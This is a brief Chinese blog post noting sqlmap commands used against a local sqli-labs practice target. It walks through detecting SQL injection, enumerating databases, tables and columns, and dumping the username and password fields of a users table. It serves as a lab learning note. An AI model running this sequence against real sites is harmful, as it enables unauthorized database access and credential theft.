【20171116早】sqlmap 扫描sql注入漏洞

sqlmap发现并利用sql注入的利器,值得记录使用过程:

1、检测是否存在漏洞:
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3
2、获取数据库信息:
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1"  --dbms mysql --level 3 --dbs
3、数据库表信息:
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1"  --dbms mysql --level 3 -D security --tables
4、表中字段信息
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users --columns
5、字段值数据
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users -C "username,password" --dump

 

posted @ 2017-11-16 07:41  黑楼绝  阅读(1667)  评论(0编辑  收藏  举报